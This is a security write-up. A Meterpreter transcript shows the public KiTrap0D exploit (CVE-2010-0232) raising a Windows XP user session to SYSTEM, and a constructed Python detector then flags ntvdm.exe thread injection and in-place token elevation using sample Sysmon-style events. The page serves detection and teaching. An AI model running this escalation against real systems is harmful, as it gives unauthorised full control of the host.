meterpreter > getuid
Server username: XPSP2\user
meterpreter > getprivs
============================================================
Enabled Process Privileges
============================================================
  SeShutdownPrivilege
  SeChangeNotifyPrivilege
  SeUndockPrivilege

meterpreter > sysinfo
Computer: XPSP2
OS      : Windows XP (Build 2600, Service Pack 2).
Arch    : x86
Language: en_US
meterpreter > run kitrap0d
[*] Currently running as XPSP2\user
[*] Loading the vdmallowed executable and DLL from the local system...
[*] Uploading vdmallowed to C:\DOCUME~1\user\LOCALS~1\Temp\fEiMXC.exe...
[*] Uploading vdmallowed to C:\DOCUME~1\user\LOCALS~1\Temp\vdmexploit.dll...
[*] Escalating our process (PID:1948)...
[*] Received WebDAV PROPFIND request from 192.168.2.105:1372
[*] Sending 404 for /pXdaQozNq/cmd.exe ...
'\\192.168.2.104\pXdaQozNq'
CMD.EXE was started with the above path as the current directory.
UNC paths are not supported.  Defaulting to Windows directory.
--------------------------------------------------
Windows NT/2K/XP/2K3/VISTA/2K8/7 NtVdmControl()->KiTrap0d local ring0 exploit
-------------------------------------------- taviso@sdf.lonestar.org ---
[?] GetVersionEx() => 5.1
[?] NtQuerySystemInformation() => \WINDOWS\system32\ntkrnlpa.exe@804D7000
[?] Searching for kernel 5.1 signature: version 2...
[+] Trying signature with index 3
[+] Signature found 0x2890a bytes from kernel base
[+] Starting the NTVDM subsystem by launching MS-DOS executable
[?] CreateProcess("C:\WINDOWS\twunk_16.exe") => 300
[?] OpenProcess(300) => 0x7e8
[?] Injecting the exploit thread into NTVDM subsystem @0x7e8
[?] WriteProcessMemory(0x7e8, 0x2070000, "VDMEXPLOIT.DLL", 14);
[?] WaitForSingleObject(0x7d4, INFINITE);
[?] GetExitCodeThread(0x7d4, 0012FF44); => 0x77303074
[+] The exploit thread reports exploitation was successful
[+] w00t! You can now use the shell opened earlier
[*] Deleting files...
[*] Now running as NT AUTHORITY\SYSTEM
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > getprivs
============================================================
Enabled Process Privileges
============================================================
  SeDebugPrivilege
  SeTcbPrivilege
  SeCreateTokenPrivilege
  SeAssignPrimaryTokenPrivilege
  SeLockMemoryPrivilege
  SeIncreaseQuotaPrivilege
  SeSecurityPrivilege
  SeTakeOwnershipPrivilege
  SeLoadDriverPrivilege
  SeSystemtimePrivilege
  SeProfileSingleProcessPrivilege
  SeIncreaseBasePriorityPrivilege
  SeCreatePagefilePrivilege
  SeCreatePermanentPrivilege
  SeBackupPrivilege
  SeRestorePrivilege
  SeShutdownPrivilege
  SeAuditPrivilege
  SeSystemEnvironmentPrivilege
  SeChangeNotifyPrivilege
  SeUndockPrivilege
  SeManageVolumePrivilege

meterpreter >
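The transcript above shows the host-side footprint of KiTrap0D (Tavis Ormandy's NtVdmControl()->KiTrap0d bug, fixed by Microsoft as MS10-015 / CVE-2010-0232): an unprivileged process starts the NTVDM subsystem by launching a 16-bit program (twunk_16.exe, hosted by ntvdm.exe as PID 300), writes a DLL name into it and injects a thread, and afterwards the original process (PID 1948) reports a SYSTEM token without ever being re-created. The detection logic below is an added example written for this page, not Metasploit's code or anything from the exploit author. It runs over constructed process-creation and remote-thread events, loosely modelled on Sysmon event IDs 1 and 8 with shortened field names; the PIDs, images and users other than those visible in the transcript are invented.

```python
"""Flag two observables of the KiTrap0D sequence seen in the transcript:
A) a non-service account creates a remote thread inside ntvdm.exe, and
B) a PID first seen as a normal user is later observed acting as a
   privileged account with no new process-creation event for that PID,
   i.e. its token was replaced in place ("Escalating our process (PID:1948)").

Hypothetical code for this page; events are constructed, not captured."""

from dataclasses import dataclass

PRIVILEGED = {
    r"NT AUTHORITY\SYSTEM",
    r"NT AUTHORITY\LOCAL SERVICE",
    r"NT AUTHORITY\NETWORK SERVICE",
}


@dataclass(frozen=True)
class Alert:
    rule: str
    pid: int
    detail: str


def basename(path: str) -> str:
    """Last component of a Windows path, lower-cased for comparison."""
    return path.rsplit("\\", 1)[-1].lower()


def detect(events: list[dict]) -> list[Alert]:
    alerts: list[Alert] = []
    first_user: dict[int, str] = {}  # pid -> account it was first observed as

    def observe(pid: int, user: str) -> None:
        # Rule B: same PID, now a privileged account, but first seen unprivileged
        # and no process-creation event has reset the record since.
        seen = first_user.setdefault(pid, user)
        if seen != user and user in PRIVILEGED and seen not in PRIVILEGED:
            alerts.append(Alert("in-place-token-elevation", pid,
                                f"first seen as {seen}, now acting as {user}"))

    for ev in events:
        if ev["id"] == 1:  # process creation (Sysmon ID 1 style)
            observe(ev["ppid"], ev["parent_user"])
            first_user[ev["pid"]] = ev["user"]  # a new process resets the record
        elif ev["id"] == 8:  # remote thread (Sysmon ID 8 style)
            observe(ev["src_pid"], ev["src_user"])
            # Rule A: ntvdm.exe only exists on 32-bit Windows and is the host
            # the transcript shows the exploit thread being injected into.
            if (basename(ev["tgt_image"]) == "ntvdm.exe"
                    and ev["src_user"] not in PRIVILEGED):
                alerts.append(Alert(
                    "unprivileged-thread-into-ntvdm", ev["src_pid"],
                    f"{basename(ev['src_image'])} -> ntvdm.exe (pid {ev['tgt_pid']})"))
    return alerts


# Constructed sample mirroring the transcript: 1948 is the unprivileged
# Meterpreter process, fEiMXC.exe the uploaded dropper, 300 the NTVDM host.
# stage.exe, PIDs 600/1700/2200/2400/2500 and the service rows are invented.
SAMPLE_EVENTS = [
    {"id": 1, "pid": 600, "image": r"C:\WINDOWS\system32\services.exe",
     "user": r"NT AUTHORITY\SYSTEM", "ppid": 400, "parent_user": r"NT AUTHORITY\SYSTEM"},
    {"id": 1, "pid": 2500, "image": r"C:\WINDOWS\system32\svchost.exe",
     "user": r"NT AUTHORITY\SYSTEM", "ppid": 600, "parent_user": r"NT AUTHORITY\SYSTEM"},
    {"id": 1, "pid": 1948, "image": r"C:\DOCUME~1\user\Desktop\stage.exe",
     "user": r"XPSP2\user", "ppid": 1700, "parent_user": r"XPSP2\user"},
    {"id": 1, "pid": 2200, "image": r"C:\DOCUME~1\user\LOCALS~1\Temp\fEiMXC.exe",
     "user": r"XPSP2\user", "ppid": 1948, "parent_user": r"XPSP2\user"},
    # twunk_16.exe is a 16-bit program, so ntvdm.exe is the process created
    {"id": 1, "pid": 300, "image": r"C:\WINDOWS\system32\ntvdm.exe",
     "user": r"XPSP2\user", "ppid": 2200, "parent_user": r"XPSP2\user"},
    {"id": 8, "src_pid": 2200, "src_image": r"C:\DOCUME~1\user\LOCALS~1\Temp\fEiMXC.exe",
     "src_user": r"XPSP2\user", "tgt_pid": 300, "tgt_image": r"C:\WINDOWS\system32\ntvdm.exe"},
    # after exploitation PID 1948 spawns a child while holding a SYSTEM token
    {"id": 1, "pid": 2400, "image": r"C:\WINDOWS\system32\cmd.exe",
     "user": r"NT AUTHORITY\SYSTEM", "ppid": 1948, "parent_user": r"NT AUTHORITY\SYSTEM"},
]

if __name__ == "__main__":
    for a in detect(SAMPLE_EVENTS):
        print(f"{a.rule}: pid {a.pid}: {a.detail}")
```

Rule A is specific to this 2010 technique and to 32-bit hosts; rule B is the one worth keeping, since any exploit that swaps a token in place (rather than spawning a new privileged process) produces the same mismatch between the account a PID was created as and the account it later acts as. Real Sysmon events carry the parent account in the ParentUser field of event ID 1 and the source process in event ID 8; a production rule should also treat a PID reuse across a process-termination event as a reset, which the constructed sample does not exercise.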